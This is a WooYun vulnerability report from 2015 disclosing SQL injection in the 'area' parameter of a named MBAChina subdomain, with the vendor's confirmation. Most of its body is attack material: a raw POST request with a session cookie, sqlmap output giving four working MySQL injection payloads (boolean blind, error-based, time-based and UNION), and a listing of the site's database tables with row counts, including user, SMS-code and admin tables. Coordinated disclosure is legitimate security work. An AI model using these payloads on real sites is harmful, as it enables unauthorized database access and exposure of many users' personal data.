当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154839

漏洞标题:MBAChina某站存在SQL注入漏洞

相关厂商:MBAChina

漏洞作者: 路人甲

提交时间:2015-11-23 13:37

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

POST /ajax/school HTTP/1.1
Content-Length: 291
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=c4652c59b4fb121a55ebbbd180ee82e8; Hm_lvt_f32f93fde409792bf8eb50545077d14d=1447949240,1447949240,1447949253,1447949253; Hm_lpvt_f32f93fde409792bf8eb50545077d14d=1447949253; CNZZDATA1408427=cnzz_eid%3D1443630501-1447947757-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447947757; HMACCOUNT=AA0A86F87DACB9AE
Host: smba.mbachina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
area=11

71.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: area (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: area=(SELECT (CASE WHEN (8730=8730) THEN 8730 ELSE 8730*(SELECT 8730 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: area=11 AND (SELECT 2320 FROM(SELECT COUNT(*),CONCAT(0x717a767171,(SELECT (ELT(2320=2320,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area=11 AND (SELECT * FROM (SELECT(SLEEP(5)))gELp)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: area=11 UNION ALL SELECT CONCAT(0x717a767171,0x50686c66535a6f584870,0x716a766a71),NULL--
---
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: yuanxiaoku
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| bmgl_user_school | 295790 |
| bmgl_user_basic | 75045 |
| bmgl_user_detail | 74830 |
| mba_sendmail_log | 63868 |
| bmgl_develop_info | 62120 |
| mba_user_info | 48207 |
| bmgl_user_info | 40634 |
| mba_user_edu | 25981 |
| mba_sms_log | 24390 |
| mba_user_work | 21608 |
| mba_fair_user_school | 13015 |
| zw_school_comment | 10767 |
| mba_activity_user | 10718 |
| mba_sms_code | 8597 |
| bmgl_user_affix | 4073 |
| mba_fair_user_info | 3886 |
| mba_fair_user_basic | 3881 |
| mba_fair_user_schoolrooms | 3702 |
| bmgl_otherdegree_info | 3605 |
| mba_fair_user_edu | 2880 |
| bmgl_eduexperience_info | 1613 |
| mba_fair_user_work | 1525 |
| bmgl_beforejob_info | 1497 |
| zw_school_hisstudent | 1497 |
| zw_school_historyscore | 1483 |
| mba_activity | 1441 |
| mba_access | 1357 |
| mba_meeting_room | 1224 |
| bmgl_team_school | 1094 |
| mba_meeting_user | 601 |
| mba_wenda | 594 |
| bmgl_school_info | 493 |
| mba_wenda_admin | 464 |
| mba_meeting_base | 442 |
| mba_fair_user_question | 296 |
| zw_school_info | 272 |
| mba_showrooms_school_commonques | 271 |
| mba_node | 263 |
| mba_feedback | 252 |
| mba_tiezi | 241 |
| mba_showrooms_school_alumni | 237 |
| mba_colleage_remarks | 195 |
| mba_showrooms_school_campus | 166 |
| zw_teacher_info | 162 |
| mba_showrooms_school_teacher | 147 |
| bmgl_item_field | 135 |
| mba_menu | 124 |
| mba_showrooms_school_loop | 106 |
| mba_message_user | 104 |
| mba_showrooms_school | 92 |
| mba_mydir_user | 84 |
| mba_showrooms_school_item | 72 |
| mba_role_user | 63 |
| mba_admin | 59 |
| mba_showrooms_school_admin | 58 |
| bmgl_apply_field | 54 |
| zt_apply_user | 48 |
| mba_college_user | 42 |
| mba_college_app | 41 |
| mba_showrooms_school_base | 34 |
| zw_user_info | 27 |
| mba_ad | 25 |
| bmgl_item_folder | 22 |
| mba_category | 22 |
| mba_role | 17 |
| bmgl_item_info | 16 |
| zw_student_info | 14 |
| zw_enschool_info | 12 |
| bm_student_condition | 10 |
| mba_showrooms | 10 |
| zt_apply_progress | 10 |
| zw_advert_info | 9 |
| mba_user_bm | 8 |
| bm_house_item | 6 |
| bm_house_batch | 5 |
| bm_houseschool_info | 5 |
| zw_teacher_openclass | 5 |
| bm_house_agent | 4 |
| bm_house_train | 3 |
| bmgl_gain_info | 3 |
| bmgl_sms_code | 3 |
| bmgl_sms_log | 3 |
| bm_student_apply | 2 |
| mba_message | 2 |
| bmgl_blame_info | 1 |
| bmgl_credit_info | 1 |
| bmgl_englistscore_info | 1 |
| bmgl_otherenglish_info | 1 |
| zt_apply_info | 1 |
+---------------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-27 15:07

厂商回复:

非常感谢您,问题已着手处理,感谢您对我们安全工作的关注。欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无